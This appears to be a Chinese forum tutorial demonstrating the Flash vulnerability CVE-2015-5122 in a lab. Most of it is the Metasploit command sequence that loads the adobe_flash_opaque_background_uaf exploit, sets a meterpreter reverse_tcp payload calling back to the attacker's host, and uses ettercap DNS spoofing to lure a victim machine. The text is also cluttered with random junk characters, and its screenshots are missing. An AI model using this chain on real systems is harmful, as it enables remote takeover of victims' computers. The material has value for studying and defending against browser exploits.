cve2015-5122漏洞实例演示虚拟机

admin

5 a$ [8 @; ?* o; \- _+ n 二、cve2015-5122漏洞实例演示虚拟机 + [& T/ R: D) C

9 S! l7 K$ H1 Q& Y0 g) H

% S" {* Z* N2 u3 E) a. O! n   关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： : K" R4 v0 Z* Y

, _2 a8 L+ c. H, D

, X/ B& K& t+ O9 F: A, i: i search cve-2015-5122如图： 5 {, b0 D& T3 y% Y

) }7 V, `* s Y4 H3 j J/ O7 O

_0 W/ i9 q/ p   ' z3 k8 b0 F+ j- L. P& p0 N

, {) b2 n {% w% a

下面我们敲如下命令：

* _+ K1 h- ^% T) n+ J use exploit/multi/browser/adobe_flash_opaque_background_uaf % n: m( F. F7 { V

5 Y2 N; D( `- ?) P9 ^

$ k+ Y- y3 T6 h4 p) \+ d& N" I set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.0.109 / `8 I6 l+ j( b) E

3 q/ t0 c; c' O# B+ Q- [

5 @2 [, T- |1 Y5 ^" V0 E set URIPATH /                        /*根目录*/

7 A, X, X- e: E

set SRVHOST 192.168.0.109  //192.168.0.109为kaili ip地址 ' l' ]! e5 Y& E) M

# W! x$ U9 P9 o( r$ i9 o, h set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # ~6 N/ Q7 ? ]& K. J1 G

* S# l7 ]6 T) [% ]. N+ z! |

; t8 Q1 Q% s( Q+ i: _* m0 g; r 然后show options如图： ' m! K! r* O8 Q1 N

! u7 l$ x6 Z1 ~7 V/ u, g) t" J R* w2 R   , q6 Z' ^# @3 x

一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：

5 F. \- f+ ~" E/ p" x 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 9 V0 \% d( A$ @* w

- o6 ~' e4 d3 g( @2 U Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf

4 [- k6 D. Q$ E( U3 R, x. w

9 d7 W9 p" ?. b) J   6 B/ Z( r$ M" G7 V& S

成功了，这时候我们断开ettercap，如图： % B8 p) _; t0 i% U( z5 _5 Z

, K) h [+ o: f( Q" u: z2 K! S6 }

  , B9 D+ K3 m, S9 Z s

- _5 o7 ]- g& ?( U- @

Screenshot如图： 2 X" \3 F% a6 H4 ]: g

8 m2 Y' O3 X+ d0 C h

1 |" V. g) U, e' E2 k6 U4 b _5 {  

0 z5 w5 [$ G! B5 p& {, r " l7 F# c+ ~7 }* v2 n6 k9 R+ H* [